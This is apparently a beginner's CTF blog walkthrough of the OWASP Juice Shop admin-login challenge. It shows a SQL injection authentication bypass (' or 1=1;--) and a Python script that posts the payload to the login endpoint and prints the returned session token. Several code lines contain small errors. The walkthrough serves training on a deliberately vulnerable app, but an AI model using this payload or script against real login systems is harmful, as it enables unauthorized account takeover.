DEV Community

Cover image for Logging with the administrator's user account OWASP Juice shop
I Am A Hacker
I Am A Hacker

Posted on

Logging with the administrator's user account OWASP Juice shop

Hi, I am a hacker and its nice to have you on board in this blog we will look at Logging in with the administrator's user account it is a challenge from OWASP in the OWASP juice shop and just to add a little bit of background to this blog I am doing a series on CTF that is hacking into OWASP juice shop it just a walkthrough for beginner to learn how to approach certain CTF challenges and get started.

click here to view the complete series

let's get started…

first, let's take some notes or write down some points.. so that we can fall back on them later...
so,

-- our main goal here is to log in with the administrator

our main goal here is to log in with the administrator

-- and we have a login page

login page

let's look and see if it's vulnerable to SQL injections by typing a single court "'" in the username.

Image description

-- yes it is vulnerable to SQL injection
-- now lets us a payload that is ' or 1=1;-- in the username field and add anything in the password like.

Image description

Got em.

Image description

now let me explain what happened, suppose we have an SQL query.



select * from users where username = "entered username" and password = "entered password"


Enter fullscreen mode Exit fullscreen mode

so we need true from both, the username condition as well the password condition so what we will do is we will write a single " ' " court that will stop the query there and with "or and 1=1" we make the condition true and by two dashes we ignore the rest of the query so we have a true condition in the login and hence we log in as administrator account...

Explanation

The application is vulnerable to SQL injection attacks. This means data entered by the user is integrated one-to-one in an SQL command. This can then be amended as appropriate like in our case we amended or you can say extended by adding a single court. Changing this type of SQL code can also provoke errors that provide specific details of the structure of the database or the command.

Now that we understand how everything works let's code a python program that exploits the vulnerability...

so I have opened up an empty python file and named it main.py you can name it anything now to start with our program we will first import all the libraries.

that is



import requests
import sys
import urllib3
import json


Enter fullscreen mode Exit fullscreen mode

like so,

and then to get rid of funky errors, we will write



urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarnings)


Enter fullscreen mode Exit fullscreen mode

what this line will do is, it will disable the insecure warning like when we set an HTTP or HTTPS request.

you can read about it by just googling but I guess for now it's enough to know that we are disabling the warnings with it...

anyway let's move forward and that is to define our proxies...



proxies = {'http': 'http:127.0.0.1:8000', 'https' : 'http://127.0.0.1:8000'}


Enter fullscreen mode Exit fullscreen mode

this code is written for sending all our requests through burp and that is for when we mess up something in our code we will have all our history in burp and that way it would be easy for us to figure out what went wrong..

here I want to explain one thing and that is that I have sent both HTTP and HTTPS to HTTP that something is not working right for me like I change the HTTPS link to HTTPS it doesn't work like it doesn't send any request and when I change it to HTTP it works again if anyone has a solution for it let me know so that I can implement it...

let's move forward and we will write our main function...



def main():


if __name__ == "__main__":
    main()



Enter fullscreen mode Exit fullscreen mode

inside the main function, we will first look if the number of arguments entered by the user is correct...

like



def main():
    try :
        url = sys.argv[1].strip()
    except IndexError:
        print("[-] Usage: %s <url> " % sys.argv[0])
        print("[-] Usage: %s www.example.com " % sys.argv[0])
        sys.exit(-1)


Enter fullscreen mode Exit fullscreen mode

so try is for trying out the code url = sys.argv.strip() if this works the system will assign the argument 1 (that is the second aurgument for us like things start from 0 for computers) entered by the user to url and continue running but if its not entered the program will through an error like shown in the example...

any let move forward...

now if they entered the correct aurgments we want to try and login as an administrator...

let do that by..

now this code is part of main so i wont write that again



    if login_as_administrator(url):
        print("[+] Challange completed")
        sys.exit(0)

    print("[-] Sorry something went wrong")


Enter fullscreen mode Exit fullscreen mode

now what i am doing is calling a function which is not yet created but we will create that in mint but we are calling it and check if it returned true or false if true we want to print that challenge was completed and if not we want to say that something went wrong...

just explain one more than the sys.exit code -1 is for error and 0 is saying everything is ok...

ok let create the login as administrator function...

the first thing i want to check is that if i go to owasp juice shop and look in the inspect network tab and also you can check in burp the request for login goes to /rest/user/login

Image description

like as shown in the image so and if we come over to the request tab you would see we are sending email and password.. like so..

Image description

any so our code would be



def login_as_administrator(url):

    uri = "/rest/user/login"
    data = {'email': "' or 1=1;--", 'password': 10001}

    return False



Enter fullscreen mode Exit fullscreen mode

now let use the request library and send a request to owasp juice shop...



def login_as_administrator(url):

    uri = "/rest/user/login"
    data = {'email': "' or 1=1;--", 'password': 10001}
    r = requests.post( url + uri, data = data, verify = False, proxies = proxies )
    if "authentication" in r.text:
        return True
    return False


Enter fullscreen mode Exit fullscreen mode

ok now the last thing we need to check is that if we logged in with administrator or not...

and if you are willing you can refine with by print some out like so and that's it..



if "authentication" in r.text:
        json_array = json.loads(r.text)
        print("[+] Loged In Successfull!")
        print("Email : %s" % json_array["authentication"]["umail"])
        print("Bid : %s" % json_array["authentication"]["bid"])
        print("Token : %s" % json_array["authentication"]["token"])
        return True


Enter fullscreen mode Exit fullscreen mode

visit complete code on github click here.

Top comments (0)